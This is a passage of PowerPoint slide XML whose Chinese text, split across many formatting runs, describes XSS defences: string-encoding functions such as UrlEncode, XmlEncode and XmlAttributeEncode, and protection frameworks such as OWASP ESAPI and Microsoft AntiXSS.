              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="151130" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Encode</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：将在“统一资源定位</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-35" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>器</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）”中使用的输入字符串编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a:p>
            <a:pPr marL="150495" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="151130" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>VisualBasicScriptEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>将在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Visual</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Basic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>脚本中使用的输入字符串编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a:p>
            <a:pPr marL="150495" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="151130" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XmlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>将在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>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a:p>
            <a:pPr marL="150495" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="151130" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XmlAttributeEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>将在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>属性中使用的输入字符串编</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-35" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>码</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715397" y="2167249"/>
            <a:ext cx="3237230" cy="215900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="20320" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="160"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>防护框架</a:t>
            </a:r>
            <a:endParaRPr sz="550">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="203835">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="55"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>防护框</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-35" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>架</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ANTIXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Open</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:endParaRPr sz="550">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044581" y="2330001"/>
            <a:ext cx="3049905" cy="118745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Project</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>开放式</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>应用程序安全项</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-35" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>目</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）提供的一</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>套</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>级别的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>应用解决方</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-35" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>案</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>AntiXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>是微</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044581" y="2394772"/>
            <a:ext cx="3018790" cy="118745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>软推出用于防止</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的一个类</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-35" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>库</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>AntiXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的工作机制与</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ASP.NET</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>编码函数不</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-35" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>同</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>AntiXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>使用一</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044583" y="2459541"/>
            <a:ext cx="3017520" cy="118745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
